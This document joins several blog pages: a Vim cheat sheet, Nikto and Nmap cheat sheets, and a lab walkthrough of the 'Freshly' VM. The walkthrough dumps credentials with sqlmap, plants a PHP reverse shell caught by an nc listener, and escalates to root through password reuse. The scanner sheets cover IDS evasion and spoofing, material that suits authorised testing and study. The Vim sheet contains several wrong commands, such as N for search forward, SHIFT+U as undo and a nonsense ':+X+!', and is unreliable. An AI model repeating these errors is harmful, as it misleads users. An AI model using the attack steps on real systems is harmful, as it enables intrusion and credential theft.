Vim Delete Character before the Cursor

Vim Command	Description
`X`	Vim deletes character before the cursor.

Vim Delete Word

Vim Command	Description
`dw`	Vim Delete Word, deleted the word under the cursor, from the curosr position onward

Vim Delete Line commands

Vim Delete Line

Vim Command	Description
`dd`	Delete the current line in Vim

Vim Delete until end of Line

Vim Command	Description
`D`	Deletes from cursor to end of line

Delete to end of screen

Vim Command	Description
`dL`	Deletes from cursor to end of screen

Delete to end of file

Vim Command	Description
`dG`	Deletes from cursor to end of file

Vim Delete From Cursor To Start of Line

Vim Command	Description
`d^`	Deletes from cursor to start of line

Vim Copy and Paste

Vim Copy Line

Vim Command	Description
`yy`	Copies current line into unnamed buffer

Vim Copy 3 Lines of Text

Vim Command	Description
`3yy`	Copy 3 lines of text into unnamed buffer

Vim Copy Word

Vi Command	Description
`yw`	Copy word under cursor into unnamed buffer

Vim Copy 3 Words

Vim Command	Description
`3yw`	Copy 3 words into unnamed buffer

Vim Paste Commands

Vim Command	Description
`P`	Copy contents of unamed buffer to right of cursor

Vim Command	Description
`p`	Copy contents of unamed buffer to left of cursor

Vim Search Commands

Vim Search forward

Vim Command	Description
`N`	Vim search forward in file

Vim Search Back

Vim Command	Description
`SHIFT+N`	Vim search backward in file

Vim Search and Replace Commands

Vim Search and Replace First Instance

Vim Command	Description
`:s/find-string/replace-string/`	Vim search and replace first instance of specified string

Vim Search and Replace on a Single Line

Vim Command	Description
`:s/find-string/replace-string/g`	Vim search and replace all instances of specified string on current line

Vim Search and Replace Entire File

Vim Command	Description
`:%s/find-string/replace-string/g`	Vim search and replace all instances of specified string for entire file

Vim Search for part of a Word

A fuzzy search allows you to find something that you only know part of, for example if you wanted to find all instances of lines starting with the word “Picard” you would use the following:

Vim Command	Description
`/^Picard`	Vim search within file words starting with Picard

Vim Search for words ending with $string

Vim Command	Description
`/worf$`	Vim search within file for word engine with worf

Vim Search for Metacharacters

Vim Command	Description
`/\*`	Vim search within file for metacharacters like, *

Vim Exact Match Search Only

Vim Command	Description
`/star\.`	Vim exact search only, will return instances of "star only", not starfleet or star-trek

Vim Search for a range of Strings

Helpful for finding version numbers in text files.

Vim Command	Description
`/v2.[1-9]`	Vim search for a range, this example would return all v2.1-9 instances within the file, e.g. v2.4 v2.7 etc

Vim Search for Upper and Lowercase

Search for upper and lowercase strings in Vim.

Vim Command	Description
`/ [tT] [hH [eE]`	Vim search upper or lowercase strings, this example would return any instance of the word 'the'. e.g. The, THE, tHE, tHe

Advanced Vim commands

Vim View Options

Vim Command	Description
`:set all`	Lists all Vim options

Vim Run Shell Commands

Run shell commands from Vim.

Vim Command	Description
`:! ls -l`	Run shell command from Vim, in this example ls -l is executed

Vim Joining Lines

Backspace doesn’t always work…

Vim Command	Description
`SHIFT+J`	Position the cursor in either line you wish to join, and press `SHIFT+J`

Vim Split Windows

Useful for comparing files, to switch between windows press SHIFT+W

Vim Split Window Horizontally

Vim Command	Description
`:split`	Split window Horizontally in Vim

Vim Split Window Virtically

Vim Command	Description
`:vsplit`	Split window Virtically in Vim

Vim Close All Split Windows

Vim Command	Description
`:only`	Closes all split windows and focuses on the primary window

Vim Save commands

How to Save in Vim

Vim Command	Description
`:w`	Writes the file to disk

Vim Save and Exit

How to save and exit Vim, personally I use :wq

</tr> </tr> </tr>

Vim Command	Description
`:wq`	Save and exit Vim
`:x`	Exit - Vim will prompt and ask if you wish to save
`SHIFT+ZZ`	Another way to Save and Exit Vim
`wq!`	Forces save on read only files, and exits

Misc Vim Commands

Vim Undo Command

Vi Command	Description
`U`	Press `SHIFT+U` to undo in Vi

Vim Undo All

Vim undo all since last write.

Vim Command	Description
`:+X+!`	Undo everything since last write

Vim Show File Name

SHIFT+G shows the file name, number of lines and current position.

Vim Multipliers

Almost every command in Vim can leverage multipliers, typically it’s a case of prefixing the command with a numnber. Example: 10W would move 10 words to the right.

Nikto Cheat Sheet - Commands & Examples

Dhruv Ambaliya — Fri, 15 Dec 2023 14:37:10 +0000

What is Nikto
Nikto Installation
Nikto Scan Cheat Sheet
Nikto Command Flags Sheet
Nikto Example Commands
- Nikto Scanning
- Nikto Using a Proxy
Nikto2 Features
Document Changelog

What is Nikto

Nikto is an open-source web server scanner that performs comprehensive tests to identify potentially dangerous files/programs, outdated versions of servers, server configuration items, and installed web servers and software. It also supports LibWhisker’s anti-IDS methods to avoid detection. While not every check is a security issue, most are, and there are also info-only checks and checks for unknown items.

Nikto Installation

git clone https://github.com/sullo/nikto

Nikto Update

cd into your nikto git clone directory:

git pull

Main script is in program

cd nikto/program

Check out the 2.5.0 branch

git checkout nikto-2.5.0

Run using the shebang interpreter

./nikto.pl -h http://www.foo.com

Run using perl (if you forget to chmod)

perl nikto.pl -h http://www.foo.com

list element with functor item

Nikto Scan Cheat Sheet

The following Nikto command usage for scanning a web application:

Command	Description
`nikto -h http://foo.com`	Scans the specified host
`nikto -h http://foo.com -Tuning 6`	Uses a specific Nikto scan tuning level
`nikto -h http://foo.com -port 8000`	Scans the specified port
`nikto -h http://foo.com -ssl`	Scans for SSL vulnerabilities
`nikto -h http://foo.com -Format html`	Formats output in HTML
`nikto -h http://foo.com -output out.txt`	Saves the output to a file

Nikto Command Flags Sheet

The following Nikto commands allow for configuration of a Nikto scan:

Option	Value
`-ask+`	`yes` Ask about each (default) `no` Don't ask, don't send
`-Cgidirs+`	"none", "all", or values like "/cgi/ /cgi-a/"
`-config+`	Use this config file
`-Display+`	1 Show redirects 2 Show cookies received 3 Show all 200/OK responses 4 Show URLs which require authentication D Debug output E Display all HTTP errors P Print progress to STDOUT S Scrub output of IPs and hostnames V Verbose output
`-dbcheck`	Check database and other key files for syntax errors
`-evasion+`	1 Random URI encoding (non-UTF8) 2 Directory self-reference (/./) 3 Premature URL ending 4 Prepend long random string 5 Fake parameter 6 TAB as request spacer 7 Change the case of the URL 8 Use Windows directory separator (\) A Use a carriage return (0x0d) as a request spacer B Use binary value 0x0b as a request spacer
`-Format+`	csv Comma-separated-value htm HTML Format msf+ Log to Metasploit nbe Nessus NBE format txt Plain text xml XML Format (if not specified the format will be taken from the file extension passed to -output)
`-Help`	Extended help information
`-host+`	Target host
`-IgnoreCode`	Ignore Codes--treat as negative responses
`-id+`	Host authentication to use, format is id:pass or id:pass:realm
`-key+`	Client certificate key file
`-list-plugins`	List all available plugins, perform no testing
`-maxtime+`	Maximum testing time per host
`-mutate+`	1 Test all files with all root directories 2 Guess for password file names 3 Enumerate user names via Apache (/~user type requests) 4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests) 5 Attempt to brute force sub-domain names, assume that the host name is the parent domain 6 Attempt to guess directory names from the supplied dictionary file
`-mutate-options`	Provide information for mutates
`-nointeractive`	Disables interactive features
`-nolookup`	Disables DNS lookups
`-nossl`	Disables the use of SSL
`-no404`	Disables nikto attempting to guess a 404 page
`-output+`	Write output to this file ('.' for auto-name)
`-Pause+`	Pause between tests (seconds, integer or float)
`-Plugins+`	List of plugins to run (default: ALL)
`-port+`	Port to use (default 80)
`-RSAcert+`	Client certificate file
`-root+`	Prepend root value to all requests, format is /directory
`-Save`	Save positive responses to this directory ('.' for auto-name)
`-ssl`	Force ssl mode on port
`-Tuning+`	1 Interesting File / Seen in logs 2 Misconfiguration / Default File 3 Information Disclosure 4 Injection (XSS/Script/HTML) 5 Remote File Retrieval - Inside Web Root 6 Denial of Service 7 Remote File Retrieval - Server Wide 8 Command Execution / Remote Shell 9 [SQL Injection](/penetration-testing/web-app/sql-injection/) 0 File Upload a Authentication Bypass b Software Identification c Remote Source Inclusion x Reverse Tuning Options (i.e., include all except specified)
`-timeout+`	Timeout for requests (default 10 seconds)
`-Userdbs`	Load only user databases, not the standard databases all Disable standard dbs and load only user dbs tests Disable only db_tests and load udb_tests
`-until`	Run until the specified time or duration
`-update`	Update databases and plugins from CIRT.net
`-useproxy`	Use the proxy defined in nikto.conf
`-Version`	Print plugin and database versions
`-vhost+`	Virtual host (for Host header)

Nikto Example Commands

Nikto Scanning

The following nikto commands allow you to run basic nikto scans against a web application.

Command	Description
`nikto -h [target]`	Basic scan, no HTTP options.
`nikto -h [target] -Tuning [tuning]`	Scan with a specific tuning.
`nikto -h [target] -mutate [mutate]`	Scan with a specific mutation.
`nikto -h [target] -ssl`	Scan using SSL.
`nikto -h [target] -nointeractive`	Run the scan non-interactively.

Nikto Using a Proxy

Using Nikto with a proxy such as Burp or another intercepting proxy.

Command	Description
`-useproxy`	Enable usage of the HTTP/SOCKS proxy
`-noproxy`	Specify comma separated list of hosts not to use proxy for
`-proxyhost`	Hostname or IP address of the HTTP/SOCKS proxy
`-proxyport`	Port of the HTTP/SOCKS proxy
`-proxypass`	Password for the HTTP/SOCKS proxy
`-proxyuser`	Username for the HTTP/SOCKS proxy

Nikto2 Features

SSL Support (Unix with OpenSSL or maybe Windows with ActiveState’s Perl/NetSSL)
Full HTTP proxy support
Checks for outdated server components
Save reports in plain text, XML, HTML, NBE or CSV
Template engine to easily customize reports
Scan multiple ports on a server, or multiple servers via input file (including nmap output)
LibWhisker’s IDS encoding techniques
Easily updated via command line
Identifies installed software via headers, favicons and files
Host authentication with Basic and NTLM
Subdomain guessing
Apache and cgiwrap username enumeration
Mutation techniques to “fish” for content on web servers
Scan tuning to include or exclude entire classes of vulnerability checks
Guess credentials for authorization realms (including many default id/pw combos)
Authorization guessing handles any directory, not just the root directory
Enhanced false positive reduction via multiple methods: headers, page content, and content hashing
Reports “unusual” headers seen
Interactive status, pause and changes to verbosity settings
Save full request/response for positive tests
Replay saved positive requests
Maximum execution time per target
Auto-pause at a specified time
Checks for common “parking” sites

If you found this Nikto cheat sheet useful, please share it below.

Document Changelog

Last Updated: 12/02/2024 (12th of February 2024)
Author: Dhruv Ambaliya
Notes: Checked syntax was current for latest version of Nikto.

Freshly Walkthrough

Dhruv Ambaliya — Thu, 14 Dec 2023 00:00:00 +0000

Difficulty Rating:

Author Description
SQL Injection
Wordpress - Reverse PHP Shell
Privilege Escalation
Post Exploitation Enumeration

Author Description

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification.

Port Scanning

nmap -v -p 1-65535 -sV -O -sT 10.0.1.109

Service Enumeration

Port	Service	Version Detection
`TCP: 80`	HTTP	64 Apache httpd 2.4.7 ((Ubuntu))
`TCP: 443`	HTTPS	Apache httpd
`TCP: 8080`	HTTP	Apache httpd

HTTP Enumeration

Enumeration of port 80, discovered login.php:

SQL Injection

The discovered form was vulnerable to a time-based SQL injection, SQLMap was used to expose the following databases:

available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

SQLMap was used to dump the wordpress8080 database:

sqlmap -o -u "http://10.0.1.109/login.php" --forms -D wordpress8080 -T users --risk 1 --dbms=mysql --dump

Discovered credentials:

Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+

Wordpress - Reverse PHP Shell

Wordpress was accessible on port 443 and port 8080. Authentication was successful using the discovered credentials and a PHP reverse shell was introduced to the sites source code via the wordpress theme editor.

Username	Password
admin	`SuperSecretPassword`

A reverse shell successfully connected back:

[root:~]# nc -n -v -l -p 443           
listening on [any] 443 ...
connect to [10.0.1.110] from (UNKNOWN) [10.0.1.109] 37912
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
 13:26:49 up 46 min,  0 users,  load average: 0.00, 0.01, 0.46
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege Escalation

Account credential reuse from the Wordpress admin password SuperSecretPassword allowed su - to escalate privileges to root.

$ python -c 'import pty;pty.spawn("/bin/bash")'
daemon@Freshly:/$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

daemon@Freshly:/$ su -
su -
Password: SuperSecretPassword

root@Freshly:~# id
id
uid=0(root) gid=0(root) groups=0(root)

Post Exploitation Enumeration

The file /etc/passwd contained the text:

root@Freshly:/# tail -n 5 /etc/passwd
tail -n 5 /etc/passwd
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

Additionally the file /etc/shadow had incorrect permissions allowing a non privileged user read access, allowing for offline password cracking using Hashcat / JTR.

Thanks for the VM :)

Nmap Cheat Sheet: Commands, Flags, Switches & Examples (2024)

Dhruv Ambaliya — Wed, 13 Dec 2023 10:37:10 +0000

The following Nmap cheat sheet aims to explain what Nmap is, what it does, and how to use it by providing Nmap command examples in a cheat sheet style documentation format.

Orignal Published Date: 13th December 2023

What is Nmap?

Nmap (network mapper), the god of port scanners used for network discovery and the basis for most security enumeration during the initial stages of a penetration test. The tool was written and maintained by Fyodor AKA Gordon Lyon.

Nmap displays exposed services on a target machine along with other useful information such as the verion and OS detection.

Nmap has made twelve movie appearances, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.

What is Nmap?
What does Nmap do:
Download & Install Nmap
Nmap Commands
Nmap Cheatsheet
Nmap Enumeration Command Examples
Nmap Scan Tuning & Optimisation
Nmap FAQ
Document Changelog

What does Nmap do:

Host discovery
Port discovery / enumeration
Service discovery
Operating system version detection
Hardware (MAC) address detection
Service version detection
Vulnerability / exploit detection, using Nmap scripts (NSE)
Nmap IDS / Portscan Detection & Scan Time Optimisation

Download & Install Nmap

Nmap can be downloaded from nmap.org, however commonly Nmap is installed via your Linux distributions package manager:

Debian / Ubuntu / Kali

How to Install Nmap on Ubuntu, Debian, Kali or other Linux systems using the APT package manager.

apt install nmap

Nmap RHEL / Fedora

How to Install Nmap on RHEL, Fedora, CentOS, Rocky Linux or other Linux systems using the DNF package manager.

dnf install nmap

Nmap Windows

Download Nmap for Windows and install: Nmap for Windows

Nmap MacOS

How to install nmap on MacOS using Brew.

brew install nmap

Nmap Commands

Basic Nmap scanning command examples, often used at the first stage of enumeration.

Command	Description
`nmap -sP 10.0.0.0/24`	Nmap scan the network, listing machines that respond to ping.
`nmap -p 1-65535 -sV -sS -T4 target`	A full TCP port scan using with service version detection - `T1-T5` is the speed of the scan.
`nmap -v -sS -A -T4 target`	Prints verbose output, runs stealth syn scan, T4 timing, OS and version detection + traceroute and scripts against target services.
`nmap -v -sS -A -T5 target`	Prints verbose output, runs stealth syn scan, T5 timing, OS and version detection + traceroute and scripts against target services.
`nmap -v -sV -O -sS -T5 target`	Prints verbose output, runs stealth syn scan, T5 timing, OS and version detection.
`nmap -v -p 1-65535 -sV -O -sS -T4 target`	Prints verbose output, runs stealth syn scan, T4 timing, OS and version detection + full port range scan.
`nmap -v -p 1-65535 -sV -O -sS -T5 target`	Prints verbose output, runs stealth syn scan, T5 timing, OS and version detection + full port range scan.

Agressive scan timings are faster, but could yeild inaccurate results!

T5 uses very aggressive scan timings and could lead to missed ports, T3-4 is a better compromise if you need fast results (depending on if local network or remote).

Nmap scan from file

Command	Description
`nmap -iL ip-addresses.txt`	Scans a list of IP addresses, you can add options before / after.

Nmap Scan all Ports

Command	Description
`nmap -p- target`	Nmap scan all ports, a full scan of all TCP ports on a target.

Nmap output formats

Command Description

nmap -sS -sV -T5 10.0.1.99 -oA output-all-formats

nmap output to all formats.

nmap -sV -p 139,445 -oG grep-output.txt 10.0.1.0/24

Outputs "grepable" output to a file, in this example Netbios servers.

E.g, The output file could be grepped for "Open".

nmap -sS -sV -T5 10.0.1.99 --webxml -oX - | xsltproc --output file.html -

Export nmap output to HTML report.

Nmap Netbios Examples

Command	Description
`nmap -sV -v -p 139,445 10.0.0.1/24`	Find all Netbios servers on subnet
`nmap -sU --script nbstat.nse -p 137 target`	Nmap display Netbios name
`nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 target`	Nmap check if Netbios servers are vulnerable to MS08-067

--script-args=unsafe=1 has the potential to crash servers / services

Becareful when running this command.

Nmap Nikto Scan

Nmap + Nikto scanning for specific discovered HTTP ports.

Command	Description
`nmap -p80 10.0.1.0/24 -oG - \| nikto.pl -h -`	Scans for http servers on port 80 and pipes into Nikto for scanning.
`nmap -p80,443 10.0.1.0/24 -oG - \| nikto.pl -h -`	Scans for http/https servers on port 80, 443 and pipes into Nikto for scanning.

Nmap Cheatsheet

Target Specification

Nmap allows hostnames, IP addresses, subnets.

Example:

blah.hacksofdhruv.me, nmap.org/24, 192.168.0.1; 10.0.0-255.1-254

Command	Description
`-iL`	inputfilename: Input from list of hosts/networks
`-iR`	iterate hosts: Choose random targets from the input file
`--exclude`	host1[,host2][,host3],... : Exclude hosts/networks
`--excludefile`	exclude_file: nmap exclude hosts list from file

Host Discovery

Command	Description
`-sL`	List Scan - simply list targets to scan
`-sn`	Nmap ping scan / sweep - runs a nmap network scan, with port scanning disabled
`-Pn`	Treat all hosts as online -- skip host discovery
`-PS/PA/PU/PY[portlist]`	TCP SYN/ACK, UDP or SCTP discovery to given ports. Allows you to specify a specific port nmap uses to verify a host is up e.g., -PS22 (by default nmap sends to a bunch of common ports, this allows you to be specific)
`-PE/PP/PM`	ICMP echo, timestamp, and netmask request discovery probes
`-PO[protocol list]`	IP Protocol Ping
`-n/-R`	Never do DNS resolution/Always resolve [default: sometimes]

Scan Techniques

Command	Description
`-sS -sT -sA -sW -sM`	TCP SYN scan Connect scan ACK scan Window scan Maimon scan
`-sU`	UDP Scan
`-sN -sF -sX`	TCP Null scan FIN scan Xmas scan
`--scanflags`	Customize TCP scan flags
`-sI zombie host[:probeport]`	Idle scan
`-sY -sZ`	SCTP INIT scan COOKIE-ECHO scan
`-sO`	IP protocol scan
`-b "FTP relay host"`	FTP bounce scan

Port Specification and Scan Order

Command	Description
`-p`	Specify ports, e.g. -p80,443 or -p1-65535
`-p U:PORT`	Scan UDP ports with Nmap, e.g. -p U:53
`-F`	Fast mode, scans fewer ports than the default scan
`-r`	Scan ports consecutively - don't randomize
`--top-ports "number"`	Scan "number" most common ports
`--port-ratio "ratio"`	Scan ports more common than "ratio"

Service Version Detection

Command	Description
`-sV`	Probe open ports to determine service/version info
`--version-intensity "level"`	Set from 0 (light) to 9 (try all probes)
`--version-light`	Limit to most likely probes (intensity 2)
`--version-all`	Try every single probe (intensity 9)
`--version-trace`	Show detailed version scan activity (for debugging)

Script Scan

Command	Description
`-sC`	equivalent to --script=default
`--script="Lua scripts"`	"Lua scripts" is a comma separated list of directories, script-files or script-categories
`--script-args=n1=v1,[n2=v2,...]`	provide arguments to scripts
`-script-args-file=filename`	provide NSE script args in a file
`--script-trace`	Show all data sent and received
`--script-updatedb`	Update script database
`--script-help="Lua scripts"`	Show help about scripts

OS Detection

Command	Description
`-O`	Enable OS Detection
`--osscan-limit`	Limit OS detection to promising targets
`--osscan-guess`	Guess OS more aggressively

Timing and Performance

Options which take TIME are in seconds, or append 'ms' (milliseconds), 's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).

Command	Description
`-T 0-5`	Set timing template - higher is faster (less accurate)
`--min-hostgroup SIZE --max-hostgroup SIZE`	Parallel host scan group sizes
`--min-parallelism NUMPROBES --max-parallelism NUMPROBES`	Probe parallelization
`--min-rtt-timeout TIME --max-rtt-timeout TIME --initial-rtt-timeout TIME`	Specifies probe round trip time
`--max-retries TRIES`	Caps number of port scan probe retransmissions
`--host-timeout TIME`	Give up on target after this long
`--scan-delay TIME --max-scan-delay TIME`	Adjust delay between probes
`--min-rate NUMBER`	Send packets no slower than NUMBER per second
`--max-rate NUMBER`	Send packets no faster than NUMBER per second

Firewalls IDS Evasion and Spoofing

Command	Description
`-f; --mtu VALUE`	Fragment packets (optionally w/given MTU)
`-D decoy1,decoy2,ME`	Cloak a scan with decoys
`-S IP-ADDRESS`	Spoof source address
`-e IFACE`	Use specified interface
`-g PORTNUM --source-port PORTNUM`	Use given port number
`--proxies url1,[url2],...`	Relay connections through HTTP / SOCKS4 proxies
`--data-length NUM`	Append random data to sent packets
`--ip-options OPTIONS`	Send packets with specified ip options
`--ttl VALUE`	Set IP time to live field
`--spoof-mac ADDR/PREFIX/VENDOR`	Spoof Nmap MAC address
`--badsum`	Send packets with a bogus TCP/UDP/SCTP checksum

Nmap Scan Output File Options

Command	Description
`-oN`	Output Normal
`-oX`	Output to XML
`-oS`	Script Kiddie / 1337 speak... sigh
`-oG`	Output greppable - easy to grep nmap output
`-oA BASENAME`	Output in the three major formats at once
`-v`	Increase verbosity level use -vv or more for greater effect
`-d`	Increase debugging level use -dd or more for greater effect
`--reason`	Display the reason a port is in a particular state
`--open`	Only show open or possibly open ports
`--packet-trace`	Show all packets sent / received
`--iflist`	Print host interfaces and routes for debugging
`--log-errors`	Log errors/warnings to the normal-format output file
`--append-output`	Append to rather than clobber specified output files
`--resume FILENAME`	Resume an aborted scan
`--stylesheet PATH/URL`	XSL stylesheet to transform XML output to HTML
`--webxml`	Reference stylesheet from Nmap.Org for more portable XML
`--no-stylesheet`	Prevent associating of XSL stylesheet w/XML output

Misc Nmap Options

Command	Description
`-6`	Enable IPv6 scanning
`-A`	Enable OS detection, version detection, script scanning, and traceroute
`--datedir DIRNAME`	Specify custom Nmap data file location
`--send-eth --send-ip`	Send using raw ethernet frames or IP packets
`--privileged`	Assume that the user is fully privileged
`--unprivileged`	Assume the user lacks raw socket privileges
`-V`	Show nmap version number
`-h`	Show nmap help screen

Nmap Enumeration Command Examples

The following are real world examples of Nmap enumeration.

Enumerating Netbios

The following example enumerates Netbios on the target networks, the same process can be applied to other services by modifying ports / NSE scripts.

Detect all exposed Netbios servers on the subnet.

Nmap find exposed Netbios servers

root:~# nmap -sV -v -p 139,445 10.0.1.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-11 21:26 GMT
Nmap scan report for nas.decepticons 10.0.1.12
Host is up (0.014s latency).

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MEGATRON)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MEGATRON)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 256 IP addresses (1 hosts up) scanned in 28.74 seconds

Nmap find Netbios name.

Nmap find exposed Netbios servers

root:~# nmap -sU --script nbstat.nse -p 137 10.0.1.12

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-11 21:26 GMT
Nmap scan report for nas.decepticons 10.0.1.12
Host is up (0.014s latency).

PORT STATE SERVICE VERSION
137/udp open netbios-ns

Host script results:
|_nbstat: NetBIOS name: STARSCREAM, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
Nmap done: 256 IP addresses (1 hosts up) scanned in 28.74 seconds

Nmap Netbios MS08-067

How to scan a target and identify if it is vulnerable to MS08-067

Nmap check MS08-067

root:~# nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 10.0.0.1

Nmap scan report for ie6winxp.decepticons (10.0.1.1)
Host is up (0.00026s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: NOT VULNERABLE
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds

The information gathered during the enumeration indicates the target is vulnerable to MS08-067, exploitation will confirm if it’s vulnerable to MS08-067.

Nmap Scan Tuning & Optimisation

Nmap Rate

To speed up your scan increase the rate, be aware that setting a high rate value will result in a less accurate scan.

--max-rate 
--min-rate

Nmap Parallelism

The maximum or minimum amount of parallel tasks scanned at the same time (in parallel).

TIP: If you have an basic IDS / portscan detection blocking your scans you could lower the –min-parallelism in an attempt to reduce the number of concurrent connections

--min-parallelism
--max-parallelism

Nmap Host Group Sizes

The number of hosts scanned at the same time, Note: if you are writing output to a file e.g., -oA you will need to wait for the host group to complete scanning before the nmap output will be written to the file. Therefore if you get a lagging host you will may end up waiting a while for the output file, which brings us on to… host timeout.

--min-hostgroup 
--max-hostgroup

Nmap Host Timeout

Nmap allows you to specify the timeout, which is the length of time it waits before giving up on the target. Be careful setting this super low, as you may end up with inaccurate results.

The following example would giveup after 50 seconds.

--host-timeout 50

Nmap Scan Delay

An extremely useful option to defeat basic port scan detection (SOHO devices and some IDS) that essentially monitor and block X amount of connects per second (syn flood etc). In short the scan timing can be optimised to allow nmap to bypass firewall detection mechanism.

--scan-delay 5s

For example if you know you can get away with 2 req/sec without getting blacklisted then you could use:

--scan-delay 1.2

added 200ms for a buffer

Nmap Disable DNS Lookups

Assuming you do not want domain names being looked up, use the -n flag to dissable resolution and speed up the scan.

Nmap Black List Detection?

It ussally takes and extemely long time to complete
Droppped probes nmap will increase the timeout, but it’s likely you are already black listed
To confirm, recheck a port that you know was open before

As far as I know there is no way of detecting for black listing within nmap natively.

Nmap Optimising Portscans for Targets

Once you have identified a target firewall / IDS you can look up the default settings for the portscan black list by reading the manual and use the nmap command switches above to obtain the best performance without getting black listed.

If you found this Nmap cheat sheet useful, please share it below.

Nmap FAQ

What is Nmap Used for?

Nmap (Network Mapper) is a free and open source tool for discovering and auditing networks. Many system and network administrators use Nmap to perform network inventories, asset management , manage service updating schedules, and monitor host or service availability.

Is Nmap Illegal?

When used properly, Nmap could help you protect your network from intruders. But used inappropriately (e.g., maliciously, and/or without permission from the target), Nmap could (in rare cases) get you sued, fired, expelled, jailed, or banned by your ISP.

Is Nmap a Vulnerability Scanner

Nmap is a port scanner or network mapper, the tool identified if a system exists on the network or IP address you provide. However, NSE Scripts then extend the functionality of Nmap by allowing additional host checkes that provide nmap vulnerability scanning functionality to the tool.

Why do hackers use Nmap?

Attackers or hackers may use Nmap to identify targets and the exposed ports on a target in an effort to idenitfy potential attack surface to perform addtional security testing against.

Nmap Download

You can download nmap from https://nmap.org/download or a common option would be to install via your Linux distributions package manager or Brew on macos.

Nmap Scripts List

You can find a lot of the current Nmap scripts list at https://nmap.org/nsedoc/scripts/ this list is actively updated by the Nmap project.

Document Changelog

Original Post Date: 13/12/2023
Last Updated: 10/06/2024 (10th of June 2024)
Author: Dhruv Ambaliya
Notes: Checked syntax was current for latest version of Nmap + added additional content.